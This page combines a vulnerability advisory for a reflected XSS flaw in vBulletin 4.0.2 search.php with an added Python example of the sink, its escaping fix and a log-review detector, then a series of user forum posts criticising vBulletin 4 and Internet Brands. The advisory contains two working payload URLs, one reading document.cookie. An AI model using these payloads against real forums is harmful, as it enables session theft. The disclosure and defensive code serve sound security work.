Cross Site Scripting Vulnerability for Internet Brands vBulletin 4.0.2 Patch Level 1

Vendor: Internet Brands (Nasdaq: INET)
Software: vBulletin
Version: 4.0.2 Patch Level 1
Type: Cross Site Scripting

[+] Discovered By: 5ubzer0
[+] My id : http://inj3ct0r.com/author/2307
[+] Original : http://inj3ct0r.com/exploits/9697
# Version: Vbulletin 4.0.2

www.site.com/path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query="><script>alert('xss');</script>
www.site.com/path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query="><script>alert(document.cookie);</script>
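The advisory's proof of concept works because the search box reflects the query parameter into an HTML attribute without escaping, so a leading `">` closes the attribute and tag. The following is an added example, not vBulletin's code: it models that sink with an assumed template, shows the fix (attribute-context escaping that also encodes quotes) beside it, and includes a small log-review helper for spotting such probes.

```python
# Added example (not vBulletin code). The input template, function names and
# the URL below are assumptions modelling the search.php sink the advisory reports.
import html
import re
from urllib.parse import urlsplit, parse_qs

# The advisory's payload, URL-encoded the way a browser would send it (constructed).
POC_URL = ("http://www.site.com/path/search.php?search_type=1"
           "&contenttype=vBBlog_BlogEntry"
           "&query=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E")
BENIGN_URL = ("http://www.site.com/path/search.php?search_type=1"
              "&contenttype=vBBlog_BlogEntry&query=stylevar%20bug")


def query_param(url: str) -> str:
    """Return the percent-decoded 'query' parameter of a search.php URL."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("query", [""])[0]


def render_vulnerable(query: str) -> str:
    """The reported defect: the value lands inside value="..." unescaped."""
    return f'<input type="text" name="query" value="{query}" />'


def render_hardened(query: str) -> str:
    """Attribute-context escaping; quote=True also encodes " and ' so the
    attribute cannot be closed early. The attribute itself stays quoted."""
    safe = html.escape(query, quote=True)
    return f'<input type="text" name="query" value="{safe}" />'


SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def contains_script_tag(markup: str) -> bool:
    """Does a literal <script> tag appear in the rendered page?"""
    return SCRIPT_TAG.search(markup) is not None


def looks_like_xss_probe(url: str) -> bool:
    """Log-review helper: flag search.php requests whose decoded query
    carries attribute-breaking or tag-opening characters."""
    return re.search(r'[<>"]', query_param(url)) is not None


if __name__ == "__main__":
    q = query_param(POC_URL)
    print("vulnerable:", render_vulnerable(q))
    print("hardened:  ", render_hardened(q))
```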

Marmite. – by Carnage-

You either love it or hate it, right?

It seems that the same can be said for vBulletin 4, and it's starting to bug me. On one side you've got dozens of threads proclaiming "upgrading to vb4 was the worst mistake I've ever made" and "why I ditched vb4" etc. On the other side, you've got a handful of people who are defending IB/vBulletin to greater or lesser extents, some to almost religious proportions. I want to have my say, a more realistic view on vb4, without it getting buried in another 'omg vb4 sucks' type thread.

1. vBulletin 4 has bugs; probably more than any released vBulletin version in the past. However, this is probably due in part to far greater scrutiny of the code: the bug tracker is more active, so more stuff is being reported. The other major cause is the fact that vBulletin 4 was rushed out. This was almost certainly done for 'shareholder' reasons, and I feel it was a shame that this happened. If I were a shareholder, I'd be far more interested in keeping the reputation of the brand up instead of making a quick buck in the short term.

2. Stylevars. Probably one of the biggest causes of complaints. I agree that the system is totally useless; however, one of my admins described it thus: 'It's not ****, it's just extremely verbose.' I agree with this fully. As a coder, I've dug into the stylevar system: the concept is great, the implementation is, well... lacking. I could go into how and why, but that's a tl;dr in and of itself.

3. vB4 itself. A lot of people are 'holding off on upgrades till it's better'. I've seen complaints that traffic has dropped on sites that have upgraded already. I upgraded my boards a couple of weeks ago and have seen no significant changes in traffic, positive or negative. The only complaint I've had from my members is the fact that most of the skins have not yet been converted to vb4. As far as the forum goes, there were a couple of minor issues, nothing site killing, mostly style related.

Myself, I'm pleased with vBulletin 4. The upgrade has given a breath of life into a few areas of the forums, and I'm hoping that activity will pick up more significantly in the coming weeks after I've launched the CMS. The new framework looks promising from a development point of view; I've already put together the beginnings of my own webcomic content type and written some widgets. For the longer term I've sketched out plans for a store mod. The framework needs work, but it's almost certainly going to be good to work with once the kinks are worked out.

I think what I'm trying to say here is that there are too many people saying vb4 is a disaster and not enough people giving a realistic view. It works for me; it's not spectacular, but it does its job.

My last day as an Internet Brands' "licensed customer". by texterted

I’m sad to go, in a way, as I loved the old regime and was happy with the 3x series and really looking forward to the 4x series.

I moved my site across to IPS last July after the "leak" fiasco. They gave me a free conversion to their platform, and my user base, and myself as admin, quickly adapted without much trouble and sulking.

Since then I have started another two forums both running on IPS software. So things are looking positive, which is nice.

I could only voice my discontent, at the direction that IB was taking us, with my feet and my wallet. I did this and went elsewhere for my forum solutions. I still don’t understand the business mind that IB has and why it should seem to actively want to reduce its existing customer base. I don’t really care now as I feel they are as worthless as my “owned” vB license is.

I’d like to thank some of you fellows and some of the staff for helping me with issues when I needed you.

You – the users are what really helped to make vB what it is, it’s a shame that those in charge just can’t see that.

Good luck to everyone and thanks again.

Cheers
Ted (texterted)

Internet Brands’ Customer Service Failings by nathant

So annoyed right now. I seldom rant like this but I have NEVER had as bad customer service as I have from vbulletin.

We ponied up the $285 to get the support as well as the CMS. Vbulletin came highly recommended and although I prefer open source software, we spent the money on vbulletin.

After 2 separate installs, I can’t get the visual editor to work. All I get is a bunch of placeholder text.

I emailed vbulletin support from the member’s area – after confirming my license, and all I got back was a message saying I had to get an authentication code.

I replied with the code I thought they wanted, didn’t hear anything.

Wrote back a week later. No response.

Waited another week, wrote again. Nothing.

I’ve contacted vbulletin SEVEN times to get the answer to a SIMPLE QUESTION that most likely could be answered in a few minutes, but they’re more concerned with making customers who have PAID for their software jump through their hoops to make sure that it’s not pirated.

Would I contact the company directly and draw attention to myself if I hadn’t paid?

I’ve spent a MONTH with content management system that looks awful, and makes our 9-warehouse operation look like a joke.

I’ve put in a call to the head of support at vbulletin, and no doubt I’m not going to hear back.

I don’t care if it’s your email filtering system. I don’t care if it’s your ticket support system. I don’t care if it’s the authentication code. I sent SEVEN EMAILS. Over a MONTH. On the only other reply I got, the answer was that I needed to go to your page to get an authentication code. Your page was down. And I emailed and mentioned that, so I couldn’t get that code. And I still didn’t get a reply.

You’re running a business. I PAID for a service, namely support. PROVIDE IT. I don’t care how big your company is or how you do things. Taking money for a service and not providing it is still called fraud.

I don’t care how popular your software is or how many people download it. When you offer a product – and ESPECIALLY when somebody pays more for support – you’re obligated to provide it.

Do I really have to do a credit card chargeback to get your attention? Because it’s pretty obvious that you’re not providing the service you promised.

A Customer’s Perspective of Internet Brands by Abomination

I see many many vb users in the licensed areas of Invision Power, myself included.

It appears we will make the switch to IP.Board 3.1 when it comes out also. Our forum is incompatible with the business model Internet Brands is using.

Internet Brands has a fascinating history starting out as CarsDirect.com, and I invite anyone with interest to take 10 minutes to google 'cars direct.com wiki' and read what comes up. I found Roger Penske's involvement, especially when he left the board of directors, particularly fascinating.

From what I can tell they are not interested in what the vb customer wants/needs at all, "they" being top management, not the support staff. Clearly there are people in the company that are passionate about vb and the customers' well-being.

From my perspective, IB revenue from vb is dwarfed by other income they receive, although I've not seen any hard numbers of Autodata vs vb for the licensing revenue. I do wonder, however, if the companies that pay to advertise on IB forums know where their ads are showing up; at least at one point they were being shown on a motorcycle forum which was 98% spam from Nike shoes, women's purses, and viagra ads.

The only remaining question which I continue to ask myself: Is IB purposely driving customers away so their network of sites are some of the few remaining using vb (and by that time it will be a superior product)? Or do they simply not care?

And my only remaining concern is: what will happen to the vb support staff after progressively fewer sites are using vb, and with the reduced revenue vb brings in. IB is a business. Hopefully they will be offered new positions in other parts of the company.

What Internet Brands needs to do to fix vBulletin – by Off-Topic

If IB were able to get Kier back to developing vBulletin in his original role, and a couple of the others, let's say... out with the new, in with the old, it would restore a lot of people's faith. I am not saying current developers suck (I feel quite sorry for them), though the management decisions do. I'd love to see the old vBulletin team back together. They might not fix this mess overnight, but I dare say a lot of customers would stick around for their fix-up rather than IB's (hence some going to IPB). I am on a fine line myself; the whole customization of themes is getting on my nerves more and more, slowly.

I am not a “theme” developer, yes I build websites but I don’t sell themes. vB 3 was easily customizable, vB4 is not. And I am having more and more doubts that StyleVars (even as a complete system) would make things any better. I personally think StyleVars was a very sensitive thing to put in or not. Converting the template to all CSS is one thing, but I think they should have only done that and kept the old system. Not a complete overhaul at once given IB have said VB4 comes in installments anyway. StyleVars being incomplete/buggy/etc = kills all development. Having to redevelop it, while it might prove successful runs the chance of throwing everyone off, again.

I Moved to Invision Power Board – by JaimieinNH

Sadly I joined the ranks of those that bought into the hype and found it less than desirable, so I have moved to IPB.

Is it perfect? No.
Do they listen to their customers? Yes.
Will they make mistakes? Yes.
Is their product better than vB? Depends on what you’re really looking for/at.

For me, I came to vB because it was known to be the best. Using that name, I bought into vB 4.0 being bigger and better... then came the day the site went down and their main site changed to that wonderful splash page, and I was excited... and then the forums opened... sad is what I was feeling. The design, the first impressions, was horrible.

It doesn’t take much to see that the customers here aren’t listened to unless there are a number of people screaming.. Support is lacking because of the path they (IB) have chosen and it shows.. People that have been running forums forever are having troubles with this new script and in the end I just couldn’t wait for a stable release. (stable meaning everything works and everything they said I would get was there)

So I chose to move to IPB. So far it’s been great, just looking at the pre-sales forum you will see the amount of time they spend with the community, listening, helping and communicating.. Take some time and compare pre-sales here and pre-sales there to see the difference.

For vB to become the leader again they will have to learn that the customer is always right, and we have been telling you where you are going wrong for months now... it started with the leaked slides, and you had a chance to stop, listen and do the right thing; instead you moved forward as fast as you could, and look where that's gotten you.

Time will tell the grand effect... as we all have bought the vB 4.0 license which grants us use through the next version... it will be interesting to see what your sales are when vB 5.0 comes out.

Why we ditched vb4 – by nightbloom

Yes, we ditched vBulletin 4 and deeply regret upgrading. It wasn't the cost that made us work so hard to use it, although that was a factor in us trying so hard to make it work for us. I have just always been the kind of person that goes for the best, and in the past, vBulletin software was the best.

I was very disappointed in this release.

The CMS you gave us isn't a CMS at all; it's like a cheap newspaper script. A lot of people would have rather seen vBulletin allow easy integration with Joomla, or at least a CMS that had some functionality other than straight articles with some simple blocks down the side. vBulletin's CMS is ugly, blocky, plain and lacks even rudimentary means of customization.

The forum is slow and uses too many queries. Members that had older computers had a hard time navigating the overly busy layout that was STOCK. While the CMS was by far the biggest disappointment for me, the forum software itself was a letdown. Skinning it to look like anything but recolored stock is a nightmare and gave it inexplicable bugs. (example: turning on “store CSS as files” would make some things work and other things error, turning it off has the same result.)

So I gave it time. Used it. Added stuff, took stuff away, tried to pare down the add ons to decrease load times but it just wasn’t working. So once again we have installed Joomla and PHPBB3 and functionality is better, looks have improved greatly and load time is down to 3 seconds.

Maybe vBulletin 4 is good for programmers or people who really understand the coding? I’m not either of those people. I just run a website for my gaming buddies and your software no longer seems made for someone like me or my visitors.

79 Days, 14 Hours, 30 Minutes Since vBulletin 4

At the time of my writing this post, it has been 79 days, 14 hours, 30 minutes since vBulletin 4 came out. It’s also been the same amount of time I’ve been using vBulletin 4 internally on my local server. It’s also been 79 days of hell.

Throughout these last 79 days, I’ve been fighting bugs, fighting with the lack of features, and last but not least, fighting the lack of functionality.

I was a skeptic to be honest when Internet Brands acquired Jelsoft. At first it seems like a great move, however I now have adequate proof Internet Brands is not the godsend they claimed to be. Looking at our 79th day since vBulletin 4 has been released, we’ve regressed.

vBulletin 4 is worse than IPB.
vBulletin 4 is worse than phpBB.
vBulletin 4 is worse than SMF.

To be blunt, vBulletin 4 just plain sucks. It does not deserve to be called the leader in community solutions. It's lost its shine. No longer is it "instant community", but more to the point, instant hell and disaster.

Support is lackluster at best. Attempting to run vBulletin 4 in production mode is beyond unbearable. It’s torture. Not even tolerable.

The bugs are so bad that I would equate it with an infestation.

Note: I have the utmost respect for the current vBulletin developers and project leaders. Given the mess Joe and Bob have made, it's a wonder in itself that vBulletin 4 functions at all.

vBulletin 4 – This is ridiculous – by Wilfred1

The simple, unedited truth.

Sorry guys, but I have just got to say something about v4, and it takes a lot for me to say something, but I am just completely frustrated with this software now.

For the last couple of weeks I have been trying to use it and make my site presentable, and every darn thing I try becomes a nightmare of effort. The simplest of things that you could do in just a couple of minutes in 3.8 takes 10 times as long: trying to figure out what CSS does what, with some CSS changes being made in stylevars (but that isn't complete) and some CSS changes in templates, but then they all conflict and are hard to follow. Everything is just so half baked that a person has no idea what does what anymore. And don't get me started on these vb functions taking away standard PHP lines.

What you have achieved now is to make vBulletin only for developers and not the bulk of your clients, which are those average people that would like to set up a forum and make their changes in an easy to understand and follow system.

You may say, well, why upgrade? Because if I don't, I will become like one of the many average users that seem to be leaving v4 and who will end up in time completely leaving vb altogether.

Why couldn't you have just made one major change and done it properly, so your customers could get used to it and understand it, and then another major change in 12 months, etc.?

Sorry, but I just had to get this off my chest, because I am just so darn frustrated with not being able to do the simplest of things properly and easily within the design of the software anymore. I have a fantastic v3.8 site, I am not a developer and thus one of your majority of customers, and I am finding it impossible to make my site v4.